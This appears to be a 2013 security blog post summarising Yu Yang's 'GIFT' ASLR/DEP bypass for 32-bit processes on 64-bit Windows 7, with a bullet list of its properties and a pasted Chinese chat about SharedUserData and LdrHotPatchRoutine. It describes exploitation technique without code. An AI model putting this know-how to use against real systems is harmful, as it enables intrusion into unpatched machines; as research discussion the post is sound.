I have my own talk from CanSecwest to blog about but this one is more interesting and the most awaited one. So here are the slides, I will add my own analysis and test cases to this blog entry later. Interesting thing is we had this technique discussed on garage in november Win7 64bit - NO ASLR/DEP bypass required..."vinnu" .
Yu Yang @tombkeeper did a demo of the technique on Ms013-08 and it does not ever need a heap spray for his ASLR/DEP bypass technique .
And the exploit is scary, its a quick kaboom with out heap spray.
He calls this method GIFT [ Got it form a table] .
The simple technique is to change the VFT of wow64sharedinformation and it's ptr.
Here are couple of quick notes on the bypass Technique :
Good news about the Technique:.
- Totally ASLR/DEP free
- Language/SP independent
- Work on almost all use-after-free/vtable-overflow
- Target on IE, firefox, pdf reader, flash, office …
- Even don’t need shellcode
- Sometimes don’t need heapspray
- Need a Windows file sharing server
- It is not a real problem
- Only work on 32-bit process in x64 Windows
- This situation is very common
- Can not work on Windows 8
The documents and presentation is from Yu Yang @tombkeeper
Download Slides from here:
https://docs.google.com/file/d/0B46U...it?usp=sharing
Cheers.
[3:30:49 PM] K: 原來SharedUserData可以這樣玩XD
[3:31:29 PM] n: 之前是用了這個位址 然後使用系統呼叫
[3:31:48 PM] n: win8 這個位址隨機了
[3:31:53 PM] K: GG
[3:32:14 PM] K: 不過大概還可以Work好一陣子
[3:32:15 PM] O: Win7以前+x86 only XD
[3:32:30 PM] O: tombkeeper XD
[3:33:07 PM] n: 最早一開始是透過這邊位址中文版固定 做通用的jmp esp
[3:33:55 PM] n: 然後系統呼叫 到最近的 LdrHotPatchRoutine
[2013/3/8 15:31:20] DM: [2013年3月8日 15:34] O:
<<< 所以這招真的可以在真實環境work的很通用嘛@@
以後win7以前都不用寫ROP了這樣(?
[2013/3/8 15:32:45] DM: 目前這招還不錯 不過遠端連smb 不一定連的到而已
沒有留言:
張貼留言